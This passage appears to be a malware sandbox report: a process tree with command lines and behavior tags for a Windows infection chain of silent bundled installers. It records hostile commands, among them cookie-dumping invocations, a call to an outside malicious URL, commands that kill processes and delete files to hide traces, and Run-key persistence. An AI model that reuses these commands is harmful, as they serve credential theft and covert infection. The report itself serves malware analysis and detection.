- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
7⤵
PID:4176

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
7⤵
PID:500

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
8⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:4616

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7740

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7988

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3012

C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe" /Verysilent /subid=577
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5068

C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
5⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe
"C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe" /quiet SILENT=1 AF=756
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4284

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\rfpvo2layxa.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\k5tumb5y1sa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617803388 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
6⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe
"C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe" ll
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3116

C:\Users\Admin\AppData\Local\Temp\is-NFUOL.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NFUOL.tmp\setups.tmp" /SL5="$4007A,2051888,270336,C:\Users\Admin\AppData\Local\Temp\CIISTC4ITC\setups.exe" ll
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4092

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:4980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2156

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4124

C:\Users\Admin\AppData\Local\Temp\is-JJVSC.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JJVSC.tmp\IBInstaller_97039.tmp" /SL5="$3022A,9979514,721408,C:\Users\Admin\AppData\Local\Temp\e4y0uws4bzv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4336

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
2⤵
- Checks computer location settings
PID:2924

C:\Users\Admin\AppData\Local\Temp\is-J5503.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-J5503.tmp\{app}\vdi_compiler"
2⤵
- Executes dropped EXE
PID:2988

C:\Users\Admin\AppData\Local\Temp\is-Q2S3O.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q2S3O.tmp\Setup3310.tmp" /SL5="$30232,138429,56832,C:\Users\Admin\AppData\Local\Temp\cndr502rxol\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3104

C:\Users\Admin\AppData\Local\Temp\is-4G5UI.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4G5UI.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3000

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3628

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5844

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:5360

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
3⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
"C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
4⤵
PID:5824

C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe
"C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im winxsl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\CleanerTools\winxsl.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:6260

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winxsl.exe /f
7⤵
- Kills process with taskkill
PID:6696

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:4316

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5028

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
3⤵
PID:3784

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
4⤵
PID:5312

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
5⤵
- Loads dropped DLL
- Modifies registry class
PID:5944

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
3⤵
- Executes dropped EXE
PID:3248

C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 0 306065bb10421b26.04333812 0 103
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5624

C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 1 3.1618062489.6071ac99c1607 103
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5164

C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\CL81DXK9H5\multitimer.exe" 2 3.1618062489.6071ac99c1607
6⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:5748

C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe" /Verysilent /subid=577
7⤵
- Executes dropped EXE
PID:6884

C:\Users\Admin\AppData\Local\Temp\is-UEVB6.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UEVB6.tmp\Setup3310.tmp" /SL5="$303FA,138429,56832,C:\Users\Admin\AppData\Local\Temp\n3aejwwjuw2\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6980

C:\Users\Admin\AppData\Local\Temp\is-GEKNQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GEKNQ.tmp\Setup.exe" /Verysilent
9⤵
- Drops file in Program Files directory
PID:6468

C:\Users\Admin\AppData\Local\Temp\htqbea1udqx\qkthdrfkkoe.exe
"C:\Users\Admin\AppData\Local\Temp\htqbea1udqx\qkthdrfkkoe.exe" /ustwo INSTALL
7⤵
- Executes dropped EXE
PID:6908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 648
8⤵
- Program crash
PID:7264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 664
8⤵
- Program crash
PID:7440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 764
8⤵
- Program crash
PID:7756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 800
8⤵
- Program crash
PID:7916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 880
8⤵
- Program crash
PID:7204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 900
8⤵
- Program crash
PID:7424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 1028
8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:512

C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe" /silent /subid=482
7⤵
- Executes dropped EXE
PID:6972

C:\Users\Admin\AppData\Local\Temp\is-KC3H2.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KC3H2.tmp\vpn.tmp" /SL5="$803B6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\0rudfdoar2m\vpn.exe" /silent /subid=482
8⤵
PID:7064

C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe
"C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe" /8-23
7⤵
- Executes dropped EXE
PID:7008

C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe
"C:\Users\Admin\AppData\Local\Temp\pqpa3q5uwjd\app.exe" /8-23
8⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe
"C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe" ll
4⤵
- Executes dropped EXE
PID:5784

C:\Users\Admin\AppData\Local\Temp\is-S5ONT.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S5ONT.tmp\setups.tmp" /SL5="$20394,2051888,270336,C:\Users\Admin\AppData\Local\Temp\CX5RT3Z2ZA\setups.exe" ll
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:5996

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
3⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\is-LNIT0.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LNIT0.tmp\LabPicV3.tmp" /SL5="$103D2,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5252

C:\Users\Admin\AppData\Local\Temp\is-URR7I.tmp\alpATCHInO.exe
"C:\Users\Admin\AppData\Local\Temp\is-URR7I.tmp\alpATCHInO.exe" /S /UID=lab214
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5852

C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe
"C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe" /VERYSILENT
6⤵
- Executes dropped EXE
PID:6148

C:\Users\Admin\AppData\Local\Temp\is-SUAPO.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SUAPO.tmp\prolab.tmp" /SL5="$20372,575243,216576,C:\Program Files\Uninstall Information\ZFUXLDWUIZ\prolab.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6212

C:\Users\Admin\AppData\Local\Temp\08-9cea9-e40-85eb2-72ea52878d297\Cefyshimewe.exe
"C:\Users\Admin\AppData\Local\Temp\08-9cea9-e40-85eb2-72ea52878d297\Cefyshimewe.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:6176

C:\Users\Admin\AppData\Local\Temp\f1-50522-576-1b5ba-d18a32bd64dee\ZHavyfaegace.exe
"C:\Users\Admin\AppData\Local\Temp\f1-50522-576-1b5ba-d18a32bd64dee\ZHavyfaegace.exe"
6⤵
- Executes dropped EXE
PID:6200

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe & exit
7⤵
PID:7160

C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\zi1ttb3b.fcd\gaooo.exe
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7064

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:6024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe & exit
7⤵
PID:7568

C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe
C:\Users\Admin\AppData\Local\Temp\slywqimq.lmy\jg8_8qyu.exe
8⤵
- Checks whether UAC is enabled
PID:8024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe & exit
7⤵
PID:7736

C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe
C:\Users\Admin\AppData\Local\Temp\s1ogqs5m.0dn\google-game.exe
8⤵
- Suspicious use of SetWindowsHookEx
PID:4232

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
9⤵
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe /silent & exit
7⤵
PID:7900

C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe
C:\Users\Admin\AppData\Local\Temp\c0ygbgxy.k2p\BarSetpFile.exe /silent
8⤵
PID:7856

C:\ProgramData\8953801.exe
"C:\ProgramData\8953801.exe"
9⤵
PID:7348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe & exit
7⤵
PID:5724

C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe
C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe
8⤵
- Checks processor information in registry
PID:6404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\no1jmpit.4hv\wwfvd.exe" & del C:\ProgramData\*.dll & exit
9⤵
PID:4472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wwfvd.exe /f
10⤵
- Kills process with taskkill
PID:4140

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
10⤵
- Delays execution with timeout.exe
PID:1120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe & exit
7⤵
PID:7768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5824

C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\1ixga5av.x1e\askinstall31.exe
8⤵
PID:7884

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:6996

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:7032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe & exit
7⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2796

C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\tu3seav3.zea\toolspab1.exe
9⤵
PID:7900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wo13mqr5.1zt\GcleanerWW.exe /mixone & exit
7⤵
PID:6524

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
3⤵
- Executes dropped EXE
PID:4896

C:\Users\Admin\AppData\Local\Temp\is-S72UM.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S72UM.tmp\lylal220.tmp" /SL5="$20314,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5288

C:\Users\Admin\AppData\Local\Temp\is-6DQ1F.tmp\ysAGEL.exe
"C:\Users\Admin\AppData\Local\Temp\is-6DQ1F.tmp\ysAGEL.exe" /S /UID=lylal220
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5740

C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe
"C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe" /VERYSILENT
6⤵
- Executes dropped EXE
PID:6316

C:\Users\Admin\AppData\Local\Temp\is-NM98K.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NM98K.tmp\irecord.tmp" /SL5="$60294,5922518,66560,C:\Program Files\Windows Defender\OOXHUTKQJR\irecord.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6436

C:\Program Files (x86)\i-record\i-record.exe
"C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6852

C:\Users\Admin\AppData\Local\Temp\be-17034-2c9-d6c9a-7bc878e83ddae\Hosamimajae.exe
"C:\Users\Admin\AppData\Local\Temp\be-17034-2c9-d6c9a-7bc878e83ddae\Hosamimajae.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:6356

C:\Users\Admin\AppData\Local\Temp\fd-5a4e2-abc-ae4a1-bfdc8164429ab\Ludekuripa.exe
"C:\Users\Admin\AppData\Local\Temp\fd-5a4e2-abc-ae4a1-bfdc8164429ab\Ludekuripa.exe"
6⤵
- Executes dropped EXE
PID:6392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe & exit
7⤵
- Executes dropped EXE
PID:1172

C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\deuede4h.20g\gaooo.exe
8⤵
PID:6556

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:3820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe & exit
7⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe
C:\Users\Admin\AppData\Local\Temp\psipronb.mcs\jg8_8qyu.exe
8⤵
- Checks whether UAC is enabled
PID:6968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe & exit
7⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe
C:\Users\Admin\AppData\Local\Temp\pmtedxwe.5lu\google-game.exe
8⤵
PID:3012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
9⤵
- Loads dropped DLL
PID:7996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe /silent & exit
7⤵
PID:7368

C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe
C:\Users\Admin\AppData\Local\Temp\pk3dnkbf.vkp\BarSetpFile.exe /silent
8⤵
PID:7920

C:\ProgramData\2470606.exe
"C:\ProgramData\2470606.exe"
9⤵
PID:7408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe & exit
7⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe
C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe
8⤵
- Checks processor information in registry
PID:7664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\55bfmmrr.p54\wwfvd.exe" & del C:\ProgramData\*.dll & exit
9⤵
PID:6060

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wwfvd.exe /f
10⤵
- Kills process with taskkill
PID:7928

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
10⤵
- Delays execution with timeout.exe
PID:7700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe & exit
7⤵
PID:7264

C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\qerefajx.0mx\askinstall31.exe
8⤵
PID:7384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe & exit
7⤵
PID:7992

C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
8⤵
- Suspicious use of SetThreadContext
PID:7196

C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\beihsddl.qz4\toolspab1.exe
9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3452

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rpmpnqup.0mg\GcleanerWW.exe /mixone & exit
7⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4680

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\EIWNPZWleLKv.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
4⤵
PID:4732

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
3⤵
- Executes dropped EXE
PID:5192

C:\ProgramData\444710.exe
"C:\ProgramData\444710.exe"
4⤵
PID:4680

C:\ProgramData\8625598.exe
"C:\ProgramData\8625598.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5172

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
5⤵
- Executes dropped EXE
PID:5444

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
3⤵
- Executes dropped EXE
PID:5128

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
4⤵
PID:6116

C:\Windows\SysWOW64\cmd.exe
